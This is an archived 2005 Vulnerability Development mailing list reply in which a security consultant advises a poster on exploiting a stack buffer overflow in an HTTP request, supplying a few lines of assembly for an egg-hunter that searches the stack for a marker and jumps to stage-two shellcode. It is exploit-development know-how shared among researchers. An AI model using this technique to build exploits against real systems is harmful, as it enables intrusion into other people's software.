Vulnerability Development mailing list archives
Re: Exploitation Help
From: Felix Lindner <felix.lindner () nruns com>
Date: Wed, 18 May 2005 10:20:39 +0200
On 17 May 2005 09:20:51 -0000 <ramatkal () hotmail com> wrote:
So, I am basically thinking, i overflow EIP with an address that JMP's -260 to the beginning of the Authorization header. The Authorization header then contains my Stage1 shellcode that starts searching down the stack for my Stage2 shellcode which it will find about 2k down the stack in the GET request..... I hope somebody understands what the hell i am talking about....
You could easily implement a small code in the 250 byte buffer doing the following: mov esi,esp Loop: inc esi cmp [esi],0x12345678 je found jmp short Loop found: add esi,4 jmp esi and begin your "real" shellcode with 0x1234568 or any other pattern for that matter. cheers Felix -- Felix Lindner, CISSP | Senior Security Consultant, n.runs GmbH fx () nruns com | +49 (0)171 740 20 62 A hacker does for love what others would not do for money.
Current thread:
- Exploitation Help ramatkal (May 17)
- Re: Exploitation Help James Longstreet (May 18)
- Re: Exploitation Help Felix Lindner (May 18)